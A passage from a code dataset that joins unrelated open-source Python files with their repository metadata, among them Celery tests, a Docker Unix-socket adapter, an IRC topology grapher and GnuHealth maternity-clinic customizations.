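assert _jstemplate_rendered == '{{{ raw }}} {{ var }} {% if ok %}yes{% endif %}'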
|
fogbow/fogbow-dashboard
|
horizon/templatetags/horizon.py
|
Python
|
apache-2.0
| 4,349 | 0.00046 |
"""Monitor the transaction log for changes that should be synced back to the
account backend.
TODO(emfree):
* Track syncback failure/success state, and implement retries
(syncback actions may be lost if the service restarts while actions are
still pending).
* Add better logging.
"""
import gevent
from sqlalchemy import asc, func
from inbox.util.concurrency import retry_with_logging
from inbox.log import get_logger
from inbox.models.session import session_scope
from inbox.models import ActionLog, Namespace
from inbox.actions import (mark_read, mark_unread, archive, unarchive, star,
unstar, save_draft, delete_draft, mark_spam,
unmark_spam, mark_trash, unmark_trash, send_draft)
ACTION_FUNCTION_MAP = {
'archive': archive,
'unarchive': unarchive,
'mark_read': mark_read,
'mark_unread': mark_unread,
'star': star,
'unstar': unstar,
'mark_spam': mark_spam,
'unmark_spam': unmark_spam,
'mark_trash': mark_trash,
'unmark_trash': unmark_trash,
'send_draft': send_draft,
'save_draft': save_draft,
'delete_draft': delete_draft
}
class SyncbackService(gevent.Greenlet):
"""Asynchronously consumes the action log and executes syncback actions."""
def __init__(self, poll_interval=1, chunk_size=22, max_pool_size=22):
self.log = get_logger()
self.worker_pool = gevent.pool.Pool(max_pool_size)
self.poll_interval = poll_interval
self.chunk_size = chunk_size
with session_scope() as db_session:
# Just start working from the head of the log.
# TODO(emfree): once we can do retry, persist a pointer into the
# transaction log and advance it only on syncback success.
self.minimum_id, = db_session.query(
func.max(ActionLog.id)).one()
if self.minimum_id is None:
self.minimum_id = -1
gevent.Greenlet.__init__(self)
def _process_log(self):
# TODO(emfree) handle the case that message/thread objects may have
# been deleted in the interim
with session_scope() as db_session:
query = db_session.query(ActionLog). \
filter(ActionLog.id > self.minimum_id). \
order_by(asc(ActionLog.id)).yield_per(self.chunk_size)
for log_entry in query:
self.minimum_id = log_entry.id
action_function = ACTION_FUNCTION_MAP[log_entry.action]
namespace = db_session.query(Namespace). \
get(log_entry.namespace_id)
self._execute_async_action(action_function,
namespace.account_id,
log_entry.record_id)
def _execute_async_action(self, func, *args):
self.log.info('Scheduling syncback action', func=func, args=args)
g = gevent.Greenlet(retry_with_logging, lambda: func(*args),
logger=self.log)
g.link_value(lambda _: self.log.info('Syncback action completed',
func=func, args=args))
self.worker_pool.start(g)
def _run_impl(self):
self.log.info('Starting action service')
while True:
self._process_log()
gevent.sleep(self.poll_interval)
def _run(self):
retry_with_logging(self._run_impl, self.log)
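# Hedged usage sketch: SyncbackService is a gevent Greenlet, so a supervisor
# would typically start it and then block on it (names illustrative only):
#
#     service = SyncbackService(poll_interval=1)
#     service.start()
#     service.join()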
|
rmasters/inbox
|
inbox/transactions/actions.py
|
Python
|
agpl-3.0
| 3,454 | 0 |
# Copyright 2019 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START ndb_flask]
from flask import Flask
from google.cloud import ndb
client = ndb.Client()
def ndb_wsgi_middleware(wsgi_app):
def middleware(environ, start_response):
with client.context():
return wsgi_app(environ, start_response)
return middleware
app = Flask(__name__)
app.wsgi_app = ndb_wsgi_middleware(app.wsgi_app) # Wrap the app in middleware.
class Book(ndb.Model):
title = ndb.StringProperty()
@app.route('/')
def list_books():
books = Book.query()
return str([book.to_dict() for book in books])
# [END ndb_flask]
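# Illustrative companion route (an assumption, not part of the official
# sample): it writes a Book entity, relying on the middleware above to have
# already entered client.context() for the request.
@app.route('/add/<title>')
def add_book(title):
    book = Book(title=title)
    book.put()  # persists the entity via the request's NDB context
    return 'stored: %s' % title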
|
GoogleCloudPlatform/python-docs-samples
|
datastore/cloud-ndb/flask_app.py
|
Python
|
apache-2.0
| 1,175 | 0 |
"""
Command.py
"""
from abc import ABCMeta, abstractmethod
class Command(object):
__metaclass__ = ABCMeta
@abstractmethod
def execute(self):
pass
@abstractmethod
def unexecute(self):
pass
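# A minimal concrete command, sketched to show how the abstract interface is
# meant to be used; the Light receiver is an invented example.
class LightOnCommand(Command):
    def __init__(self, light):
        self.light = light

    def execute(self):
        self.light.on()

    def unexecute(self):
        # Undo simply reverses what execute() did.
        self.light.off()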
|
Sunhick/design-patterns
|
Behavioral/Command/Command.py
|
Python
|
gpl-3.0
| 230 | 0.008696 |
from __future__ import absolute_import, unicode_literals
from case import Mock
from celery.worker.heartbeat import Heart
class MockDispatcher(object):
heart = None
next_iter = 0
def __init__(self):
self.sent = []
self.on_enabled = set()
self.on_disabled = set()
self.enabled = True
def send(self, msg, **_fields):
self.sent.append(msg)
if self.heart:
if self.next_iter > 10:
self.heart._shutdown.set()
self.next_iter += 1
class MockTimer(object):
def call_repeatedly(self, secs, fun, args=(), kwargs={}):
class entry(tuple):
canceled = False
def cancel(self):
self.canceled = True
return entry((secs, fun, args, kwargs))
def cancel(self, entry):
entry.cancel()
class test_Heart:
def test_start_stop(self):
timer = MockTimer()
eventer = MockDispatcher()
h = Heart(timer, eventer, interval=1)
h.start()
assert h.tref
h.stop()
assert h.tref is None
h.stop()
def test_send_sends_signal(self):
h = Heart(MockTimer(), MockDispatcher(), interval=1)
h._send_sent_signal = None
h._send('worker-heartbeat')
h._send_sent_signal = Mock(name='send_sent_signal')
h._send('worker')
h._send_sent_signal.assert_called_with(sender=h)
def test_start_when_disabled(self):
timer = MockTimer()
eventer = MockDispatcher()
eventer.enabled = False
h = Heart(timer, eventer)
h.start()
assert not h.tref
def test_stop_when_disabled(self):
timer = MockTimer()
eventer = MockDispatcher()
eventer.enabled = False
h = Heart(timer, eventer)
h.stop()
|
kawamon/hue
|
desktop/core/ext-py/celery-4.2.1/t/unit/worker/test_heartbeat.py
|
Python
|
apache-2.0
| 1,829 | 0 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from xml.parsers.expat import ParserCreate
class DefaultSaxHandler(object):
def start_element(self, name, attrs):
print('sax:start_element: %s, attrs: %s' % (name, str(attrs)))
def end_element(self, name):
print('sax:end_element: %s' % name)
def char_data(self, text):
print('sax:char_data: %s' % text)
xml = r'''<?xml version="1.0"?>
<ol>
<li><a href="/python">Python</a></li>
<li><a href="/ruby">Ruby</a></li>
</ol>
'''
handler = DefaultSaxHandler()
parser = ParserCreate()
parser.StartElementHandler = handler.start_element
parser.EndElementHandler = handler.end_element
parser.CharacterDataHandler = handler.char_data
parser.Parse(xml)
|
whyDK37/py_bootstrap
|
samples/commonlib/use_sax.py
|
Python
|
apache-2.0
| 739 | 0 |
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import requests.adapters
import socket
if six.PY3:
import http.client as httplib
else:
import httplib
try:
import requests.packages.urllib3 as urllib3
except ImportError:
import urllib3
RecentlyUsedContainer = urllib3._collections.RecentlyUsedContainer
class UnixHTTPConnection(httplib.HTTPConnection, object):
def __init__(self, base_url, unix_socket, timeout=60):
super(UnixHTTPConnection, self).__init__(
'localhost', timeout=timeout
)
self.base_url = base_url
self.unix_socket = unix_socket
self.timeout = timeout
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect(self.unix_socket)
self.sock = sock
class UnixHTTPConnectionPool(urllib3.connectionpool.HTTPConnectionPool):
def __init__(self, base_url, socket_path, timeout=60):
super(UnixHTTPConnectionPool, self).__init__(
'localhost', timeout=timeout
)
self.base_url = base_url
self.socket_path = socket_path
self.timeout = timeout
def _new_conn(self):
return UnixHTTPConnection(self.base_url, self.socket_path,
self.timeout)
class UnixAdapter(requests.adapters.HTTPAdapter):
def __init__(self, socket_url, timeout=60):
socket_path = socket_url.replace('http+unix://', '')
if not socket_path.startswith('/'):
socket_path = '/' + socket_path
self.socket_path = socket_path
self.timeout = timeout
self.pools = RecentlyUsedContainer(10,
dispose_func=lambda p: p.close())
super(UnixAdapter, self).__init__()
def get_connection(self, url, proxies=None):
with self.pools.lock:
pool = self.pools.get(url)
if pool:
return pool
pool = UnixHTTPConnectionPool(
url, self.socket_path, self.timeout
)
self.pools[url] = pool
return pool
def request_url(self, request, proxies):
# The select_proxy utility in requests errors out when the provided URL
# doesn't have a hostname, like is the case when using a UNIX socket.
# Since proxies are an irrelevant notion in the case of UNIX sockets
# anyway, we simply return the path URL directly.
# See also: https://github.com/docker/docker-py/issues/811
return request.path_url
def close(self):
self.pools.clear()
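# Hedged usage sketch: mounting the adapter on a requests session routes any
# http+unix:// URL through the socket. No connection is attempted until a
# request is made, so the (example) socket path need not exist yet.
import requests

def make_unix_session(socket_url='http+unix:///var/run/docker.sock'):
    session = requests.Session()
    session.mount('http+unix://', UnixAdapter(socket_url))
    return session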
|
shakamunyi/docker-py
|
docker/unixconn/unixconn.py
|
Python
|
apache-2.0
| 3,189 | 0 |
from six import string_types
from pypif.obj.common.pio import Pio
class Instrument(Pio):
"""
Information about an instrument used to take a measurement.
"""
def __init__(self, name=None, model=None, producer=None, url=None, tags=None, **kwargs):
"""
Constructor.
:param name: String with the name of the instrument.
:param model: String with the model of the instrument.
:param producer: String with the name of the producer of the instrument.
:param url: URL to the instrument website.
:param tags: List of strings or numbers that are tags for this object.
:param kwargs: Dictionary of fields that are not supported.
"""
super(Instrument, self).__init__(tags=tags, **kwargs)
self._name = None
self.name = name
self._model = None
self.model = model
self._producer = None
self.producer = producer
self._url = None
self.url = url
@property
def name(self):
return self._name
@name.setter
def name(self, name):
self._validate_type('name', name, string_types)
self._name = name
@name.deleter
def name(self):
self._name = None
@property
def model(self):
return self._model
@model.setter
def model(self, model):
self._validate_type('model', model, string_types)
self._model = model
@model.deleter
def model(self):
self._model = None
@property
def producer(self):
return self._producer
@producer.setter
def producer(self, producer):
self._validate_type('producer', producer, string_types)
self._producer = producer
@producer.deleter
def producer(self):
self._producer = None
@property
def url(self):
return self._url
@url.setter
def url(self, url):
self._validate_type('url', url, string_types)
self._url = url
@url.deleter
def url(self):
self._url = None
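# Hedged usage sketch; the field values below are invented for illustration.
if __name__ == '__main__':
    instrument = Instrument(name='powder diffractometer',
                            model='D8 Advance',
                            producer='Bruker',
                            url='http://example.com/d8',
                            tags=['xrd'])
    print('%s (%s) by %s' % (instrument.name, instrument.model,
                             instrument.producer))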
|
CitrineInformatics/pypif
|
pypif/obj/common/instrument.py
|
Python
|
apache-2.0
| 2,048 | 0.000977 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.26 on 2019-12-13 07:44
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('programs', '0012_auto_20170419_0018'),
]
operations = [
migrations.CreateModel(
name='CustomProgramsConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('change_date', models.DateTimeField(auto_now_add=True, verbose_name='Change date')),
('enabled', models.BooleanField(default=False, verbose_name='Enabled')),
('arguments', models.TextField(blank=True, default='', help_text='Useful for manually running a Jenkins job. Specify like "--usernames A B --program-uuids X Y".')),
('changed_by', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, verbose_name='Changed by')),
],
options={
'verbose_name': 'backpopulate_program_credentials argument',
},
),
]
|
stvstnfrd/edx-platform
|
openedx/core/djangoapps/programs/migrations/0013_customprogramsconfig.py
|
Python
|
agpl-3.0
| 1,294 | 0.003864 |
#!Measurement
'''
baseline:
after: true
before: false
counts: 180
detector: H1
mass: 34.2
settling_time: 20.0
default_fits: nominal
equilibration:
eqtime: 1.0
inlet: R
inlet_delay: 3
outlet: O
use_extraction_eqtime: true
post_equilibration_delay: 5
multicollect:
counts: 600
detector: H1
isotope: Ar40
peakcenter:
after: true
before: false
detector: H1
detectors:
- H1
- AX
- L2
- CDD
integration_time: 0.262144
isotope: Ar40
peakhop:
generate_ic_table: false
hops_name: ''
ncycles: 0
use_peak_hop: false
'''
ACTIVE_DETECTORS=('H2','H1','AX','L1','L2','CDD')
def main():
info('unknown measurement script')
set_deflection('CDD', 400)
activate_detectors(*ACTIVE_DETECTORS)
if mx.peakcenter.before:
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope)
if mx.baseline.before:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
position_magnet(mx.multicollect.isotope, detector=mx.multicollect.detector)
#sniff the gas during equilibration
if mx.equilibration.use_extraction_eqtime:
eqt = eqtime
else:
eqt = mx.equilibration.eqtime
'''
Equilibrate is non-blocking, so use a sniff or sleep as a placeholder,
e.g. sniff(<equilibration_time>) or sleep(<equilibration_time>)
'''
equilibrate(eqtime=eqt, inlet=mx.equilibration.inlet, outlet=mx.equilibration.outlet,
delay=mx.equilibration.inlet_delay)
set_time_zero()
sniff(eqt)
set_fits()
set_baseline_fits()
# delay to mitigate 39Ar spike from inlet valve close
sleep(mx.equilibration.post_equilibration_delay)
#multicollect on active detectors
multicollect(ncounts=mx.multicollect.counts, integration_time=1)
if mx.baseline.after:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
if mx.peakcenter.after:
activate_detectors(*mx.peakcenter.detectors, **{'peak_center':True})
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope,
integration_time=mx.peakcenter.integration_time)
if use_cdd_warming:
gosub('warm_cdd', argv=(mx.equilibration.outlet,))
set_deflection('CDD', 50)
info('finished measure script')
|
USGSDenverPychron/pychron
|
docs/user_guide/operation/scripts/examples/argus/measurement/jan_unknown_air_for_38Ar_600_180.py
|
Python
|
apache-2.0
| 2,496 | 0.014824 |
#
# author: Cosmin Basca
#
# Copyright 2010 University of Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import signal
from subprocess import Popen, PIPE, STDOUT, call
from threading import Thread
from natsort import natsorted
__author__ = 'basca'
__LIB_NAME__ = 'jvmrdftools-assembly-'
__LIB__ = os.path.join(os.path.dirname(os.path.realpath(__file__)), "lib")
__JARS__ = natsorted([(jar.replace(__LIB_NAME__, "").replace(".jar", ""),
os.path.join(__LIB__, jar))
for jar in os.listdir(__LIB__) if jar.startswith(__LIB_NAME__)],
key=lambda (ver, jar_file): ver)
def latest_jar():
global __JARS__
return __JARS__[-1]
class JavaNotFoundException(Exception):
pass
DEVNULL = open(os.devnull, 'w')
XMS = 128
XMX = 2048
def check_java(message=""):
if call(['java', '-version'], stderr=DEVNULL) != 0:
raise JavaNotFoundException(
'Java is not installed in the system path. {0}'.format(message))
def run_tool(main_class, xms=XMS, xmx=XMX, *options):
latest_version, jar_path = latest_jar()
command = ["java", "-Xms{0}m".format(xms), "-Xmx{0}m".format(xmx), "-classpath", jar_path, main_class] + \
[str(opt) for opt in options]
# call(command, stdout=PIPE, stdin=PIPE, stderr=STDOUT, preexec_fn=os.setsid)
call(command)
# ----------------------------------------------------------------------------------------------------------------------
#
# the specific tools
#
# ----------------------------------------------------------------------------------------------------------------------
def run_lubm_generator(num_universities, index, generator_seed, ontology, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.LubmGenerator",
xms, xmx,
"--num_universities", num_universities,
"--start_index", index,
"--seed", generator_seed,
"--ontology", ontology,
"--output_path", output_path)
def run_nxvoid_generator(source, dataset_id, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.NxVoidGenerator",
xms, xmx,
"--source", source,
"--dataset_id", dataset_id,
"--output_path", output_path)
def run_jvmvoid_generator(source, dataset_id, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.VoIDGenerator",
xms, xmx,
"--source", source,
"--dataset_id", dataset_id,
"--output_path", output_path)
def run_rdf2rdf_converter(source, destination, xms=XMS, xmx=XMX):
run_tool("com.rdftools.Rdf2RdfConverter",
xms, xmx,
source, destination)
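# Hedged usage sketch; both file paths are placeholders.
if __name__ == '__main__':
    check_java()  # raises JavaNotFoundException when no JVM is on the PATH
    run_rdf2rdf_converter('/tmp/input.nt', '/tmp/output.ttl')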
|
cosminbasca/rdftools
|
rdftools/tools/jvmrdftools/__init__.py
|
Python
|
apache-2.0
| 3,224 | 0.001861 |
import json
from django import http
from django.conf import settings
from rmr.types import JsonDict
class RequestDecoder:
content_type = 'application/json'
allowed_methods = {
'POST', 'PUT', 'PATCH',
}
def process_request(self, request):
if request.method not in self.allowed_methods:
return
content_type = request.META.get('CONTENT_TYPE', '')
if not content_type.startswith(self.content_type):
return
encoding = request.encoding or settings.DEFAULT_CHARSET
try:
body = request.body.decode(encoding=encoding)
except UnicodeDecodeError:
return http.HttpResponseBadRequest('bad unicode')
try:
request.POST = self.json_decode(body)
except ValueError:
return http.HttpResponseBadRequest('malformed data')
@staticmethod
def json_decode(body):
data = json.loads(body)
if not isinstance(data, dict):
            # all data of type other than dict will be returned as is
return data
return JsonDict(data)
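A hedged wiring sketch (the settings layout is hypothetical): since this class implements the old-style process_request hook, it would be listed in MIDDLEWARE_CLASSES.

# settings.py (hypothetical project)
MIDDLEWARE_CLASSES = [
    'django.middleware.common.CommonMiddleware',
    'rmr.middleware.json.RequestDecoder',  # decodes JSON bodies into request.POST
]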
|
RedMadRobot/rmr_django
|
rmr/middleware/json.py
|
Python
|
mit
| 1,109 | 0 |
#!/usr/bin/python
"""
Copyright 2012
Anton Zering <synth@lostprofile.de>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
try:
import yapgvb
import irclib
except ImportError:
    print "Some dependencies could not be fulfilled. Exiting."
sys.exit(0)
SERVER = ("efnet.portlane.se", 6667)
NICK = "topologybot"
OUTPUT_FILE = "%s_topology.png" % SERVER[0]
def generate_links(links):
    """ render the topology of IRC server links as a graph """
    # Create a new undirected graph
    graph = yapgvb.Graph('%s-topology' % SERVER[0])
nodes = {}
for link in links:
nodes[link[0]] = graph.add_node(label= link[0])
for link in links:
if link[0] == link[1]:
continue
nodes[link[0]] >> nodes[link[1]]
graph.layout(yapgvb.engines.dot)
format = yapgvb.formats.png
filename = OUTPUT_FILE
graph.render(filename)
class IRCCat(irclib.SimpleIRCClient):
def __init__(self):
irclib.SimpleIRCClient.__init__(self)
self.links = []
def on_welcome(self, connection, event):
print "connected, fetching links"
connection.links()
def on_links(self, connection, event):
print event.arguments()
self.links.append(event.arguments())
def on_endoflinks(self, connection, event):
print "rendering"
generate_links(self.links)
connection.disconnect()
def on_disconnect(self, connection, event):
sys.exit(0)
def main():
c = IRCCat()
try:
print "connecting"
c.connect(SERVER[0], SERVER[1], NICK)
except irclib.ServerConnectionError, x:
print x
sys.exit(1)
c.start()
if __name__ == "__main__":
main()
|
synthomat/irc_topology_drawer
|
irc_topology_drawer.py
|
Python
|
apache-2.0
| 2,147 | 0.01211 |
# -------------------------------------------------------------------------------
# mmc.py
#
# Customization of GnuHealth for the needs of Mercy Maternity Clinic, Inc.
# -------------------------------------------------------------------------------
from trytond.model import ModelView, ModelSingleton, ModelSQL, fields
from trytond.pyson import Eval, Not, Bool, Or, And
from trytond.pool import Pool
import datetime
import logging
__all__ = [
'MmcReports',
'MmcSequences',
'MmcPatientData',
'MmcPatientDiseaseInfo',
'MmcVaccination',
'MmcPatientMedication',
'MmcMedicationTemplate',
'MmcPatientPregnancy',
'MmcPrenatalEvaluation',
'MmcPerinatal',
'MmcPerinatalMonitor',
'MmcPuerperiumMonitor',
'Address',
'MmcPostpartumContinuedMonitor',
'MmcPostpartumOngoingMonitor',
]
mmcLog = logging.getLogger('mmc')
def month_num_to_abbrev(num):
    mon = {
        '01': 'Jan', '02': 'Feb', '03': 'Mar', '04': 'Apr',
        '05': 'May', '06': 'Jun', '07': 'Jul', '08': 'Aug',
        '09': 'Sep', '10': 'Oct', '11': 'Nov', '12': 'Dec',
    }
    return mon[num]
class MmcReports(ModelSingleton, ModelSQL, ModelView):
'Class for custom reports'
__name__ = 'mmc.reports'
class MmcSequences(ModelSingleton, ModelSQL, ModelView):
"Sequences for MMC"
__name__ = "mmc.sequences"
doh_sequence = fields.Property(fields.Many2One('ir.sequence',
'DOH Sequence', domain=[('code', '=', 'mmc.doh')],
required=True))
class MmcPatientData(ModelSQL, ModelView):
'Patient related information'
__name__ = 'gnuhealth.patient'
# --------------------------------------------------------
# Hide these fields
# --------------------------------------------------------
family = fields.Many2One('gnuhealth.family', 'x',
states={'invisible': True})
primary_care_doctor = fields.Many2One('gnuhealth.physician', 'x',
states={'invisible': True})
current_insurance = fields.Many2One('gnuhealth.insurance', 'x',
states={'invisible': True})
# --------------------------------------------------------
# Expand the selection list of these fields.
# --------------------------------------------------------
marital_status = fields.Function(
fields.Selection([
(None, ''),
('l', 'Live-in'),
('s', 'Single'),
('m', 'Married'),
('c', 'Concubinage'),
('w', 'Widowed'),
('d', 'Divorced'),
('x', 'Separated'),
], 'Marital Status', sort=False), 'get_patient_marital_status')
rh = fields.Selection([
('u', 'Unknown'),
('+', '+'),
('-', '-'),
], 'Rh')
# --------------------------------------------------------
# Change the label on these fields.
# --------------------------------------------------------
diseases = fields.One2Many('gnuhealth.patient.disease', 'name', 'Condition')
gravida = fields.Integer ('G', required=True)
abortions = fields.Integer('A')
stillbirths = fields.Integer('S')
# --------------------------------------------------------
# Add Pregnancy fields.
# --------------------------------------------------------
living = fields.Integer('L') # number of live births
para = fields.Integer('P') # number of times given birth
term = fields.Integer('Term') # number of pregnancies to full term
preterm = fields.Integer('Preterm') # number of pregnancies not to full term
# --------------------------------------------------------
# Add Phil Health related fields.
# --------------------------------------------------------
phil_health = fields.Boolean('Phil Health',
help='Mark if the patient has Phil Health')
phil_health_mcp = fields.Boolean('MCP',
help="If MCP applies",
states={'invisible': Not(Bool(Eval('phil_health')))},
depends=['phil_health'])
phil_health_ncp = fields.Boolean('NCP',
help="If NCP applies",
states={'invisible': Not(Bool(Eval('phil_health')))},
depends=['phil_health'])
phil_health_id = fields.Char('PHIC#',
size=14,
help="The patients Phil Health ID number",
states={
'invisible': Not(Bool(Eval('phil_health'))),
'required': Bool(Eval('phil_health'))
},
on_change=['phil_health_id'],
depends=['phil_health'])
# --------------------------------------------------------
# Add new screening related fields.
# --------------------------------------------------------
gram_stain = fields.Boolean('Gram Stain',
help="Check if gram stain was done")
breast_self_exam_taught = fields.Boolean('Taught breast self exam',
help="Check if patient has been taught how to do breast self exams")
# --------------------------------------------------------
# Department of Health required id (aka MMC ID#).
# --------------------------------------------------------
doh_id = fields.Char('MMC ID',
size=8,
help="Dept of Health id", required=False,
select=True, on_change=['doh_id'])
# --------------------------------------------------------
# Format DOH ID # in the customary fashion after the user
# types it in. User can type with hyphens or not. But don't
# change anything unless the field seems correct.
# --------------------------------------------------------
def on_change_doh_id(self):
origFld = self.doh_id
doh = origFld.replace('-', '')
val = origFld
if ((len(doh) == 6) and (doh.isdigit())):
val = "{0}-{1}-{2}".format(doh[:2], doh[2:4], doh[4:6])
return {'doh_id': val}
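    # Example (hypothetical input): entering '123456' or '12-34-56' both
    # yield {'doh_id': '12-34-56'}; any other value passes through unchanged.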
# --------------------------------------------------------
# Format PHIC# in the customary fashion after the user
# types it in. User can type with hyphens or not. But don't
# change anything unless the field seems correct.
# --------------------------------------------------------
def on_change_phil_health_id(self):
origFld = self.phil_health_id
phic = origFld.replace('-', '')
val = origFld
if ((len(phic) == 12) and (phic.isdigit())):
val = "{0}-{1}-{2}".format(phic[:2], phic[2:11], phic[-1])
return {'phil_health_id': val}
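    # Example (hypothetical input): '121234567891' is reformatted to
    # {'phil_health_id': '12-123456789-1'}; other values pass through unchanged.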
# --------------------------------------------------------
# Validate the DOH ID.
# --------------------------------------------------------
    @staticmethod
    def validate_doh_id(ids):
        for patientData in ids:
            if patientData.doh_id is None or len(patientData.doh_id) == 0:
                continue
            doh = patientData.doh_id.replace('-', '')
            if len(doh) != 6:
                return False
            if not doh.isdigit():
                return False
        return True
# --------------------------------------------------------
# Validate the PHIC #.
# --------------------------------------------------------
    @staticmethod
    def validate_phil_health_id(ids):
        for patientData in ids:
            if not patientData.phil_health:
                # if Phil Health does not apply, skip this record
                continue
            phic = patientData.phil_health_id.replace('-', '')
            if len(phic) != 12:
                mmcLog.info('Phil Health id is not the correct length')
                return False
            if not phic.isdigit():
                mmcLog.info('Phil Health id is not a number')
                return False
        return True
# --------------------------------------------------------
# Set a reasonable default sex for a maternity clinic.
# --------------------------------------------------------
@staticmethod
def default_sex():
return 'f'
# --------------------------------------------------------
# 99.4% of all people in the Philippines are RH positive.
# Oftentimes blood tests do not even test for this. But
# because it is not tested for sometimes, it should be
# set to unknown unless explicitly set.
# --------------------------------------------------------
@staticmethod
def default_rh():
return 'u'
# --------------------------------------------------------
# Add our validations to the class.
# --------------------------------------------------------
@classmethod
def __setup__(cls):
super(MmcPatientData, cls).__setup__()
cls._sql_constraints = [
('name_uniq', 'UNIQUE(name)', 'The Patient already exists !'),
('doh_uniq', 'UNIQUE(doh_id)', 'The MMC ID already exists !'),
]
cls._constraints += [
('validate_phil_health_id', 'phil_health_id_format'),
('validate_doh_id', 'validate_doh_id_format'),
]
cls._error_messages.update({
'phil_health_id_format': 'PHIC# must be 12 numbers',
'validate_doh_id_format': 'Department of Health ID must be 6 numbers'
})
# --------------------------------------------------------
# Create a Department of Health id automatically, but it
# can be overridden by the user, if desired, to another
# number or a blank value.
# --------------------------------------------------------
@classmethod
def create(cls, vlist):
sequence_obj = Pool().get('ir.sequence')
config_obj = Pool().get('mmc.sequences')
vlist = [x.copy() for x in vlist]
for values in vlist:
if not values.get('doh_id'):
config = config_obj(1)
# --------------------------------------------------------
# The sequence is prefixed with the current 4 digit year
# but we need only a two digit year and we like it formatted
# a certain way.
# --------------------------------------------------------
seq = sequence_obj.get_id(config.doh_sequence.id)[2:]
values['doh_id'] = "{0}-{1}-{2}".format(seq[:2], seq[2:4], seq[4:6])
return super(MmcPatientData, cls).create(vlist)
class MmcPatientDiseaseInfo(ModelSQL, ModelView):
'Patient Disease History'
__name__ = 'gnuhealth.patient.disease'
# --------------------------------------------------------
# Change the label of these fields.
# --------------------------------------------------------
pathology = fields.Many2One('gnuhealth.pathology', 'Condition',
required=True, help='Disease')
status = fields.Selection([
('a', 'acute'),
('c', 'chronic'),
('u', 'unchanged'),
('h', 'healed'),
('i', 'improving'),
('w', 'worsening'),
], 'Status of the condition', select=True, sort=False)
is_infectious = fields.Boolean('Infectious Condition',
help='Check if the patient has an infectious / transmissible condition')
is_active = fields.Boolean('Active condition')
class MmcVaccination(ModelSQL, ModelView):
'Patient Vaccination information'
__name__ = 'gnuhealth.vaccination'
# --------------------------------------------------------
# Was the vaccine administered by MMC?
# --------------------------------------------------------
vaccine_by_mmc = fields.Boolean('Administered by MMC',
help="Check if this vaccine was administered by Mercy Maternity Clinic")
# --------------------------------------------------------
# Hide these unnecessary fields.
# --------------------------------------------------------
vaccine_expiration_date = fields.Date('x', states={'invisible': True})
vaccine_lot = fields.Char('x', states={'invisible': True})
institution = fields.Many2One('party.party', 'x', states={'invisible': True})
date = fields.DateTime('Date', states={'invisible': True})
next_dose_date = fields.DateTime('Next Dose', states={'invisible': True})
# --------------------------------------------------------
# Allow approximate dates for recording of historical
# vaccinations per patient testimony.
# --------------------------------------------------------
cdate_month = fields.Selection([
('', ''),
('01', 'Jan'),
('02', 'Feb'),
('03', 'Mar'),
('04', 'Apr'),
('05', 'May'),
('06', 'Jun'),
('07', 'Jul'),
('08', 'Aug'),
('09', 'Sep'),
('10', 'Oct'),
('11', 'Nov'),
('12', 'Dec'),
], 'Approximate Month', help="Approximate month of the vaccination",
sort=False)
cdate_year = fields.Integer('Approximate Year (YYYY)',
help="Year of the vaccination")
# --------------------------------------------------------
# But also allow an exact date if known or vaccination is
# being administered.
# --------------------------------------------------------
cdate = fields.Date('Date',
states={
'invisible': Or(Bool(Eval('cdate_year')), And(Bool(Eval('cdate_month')),
Bool(Eval('cdate_year'))))
})
next_dose = fields.Date('Next Dose')
# --------------------------------------------------------
# Display date for tree view that shows appropriate date
# no matter if cdate or cdate_year or cdate_month and
# cdate_year chosen.
# --------------------------------------------------------
display_date = fields.Function(fields.Char('Date'), 'get_display_date')
# --------------------------------------------------------
# Choose either cdate or the cdate_month and/or cdate_year
# fields to create an appropriate display.
# --------------------------------------------------------
@staticmethod
def get_display_date(ids, name):
result = {}
for vacc in ids:
if name == 'display_date':
if vacc.cdate_year is not None and (vacc.cdate_month is None or
len(vacc.cdate_month) == 0):
result[vacc.id] = "{0}".format(vacc.cdate_year)
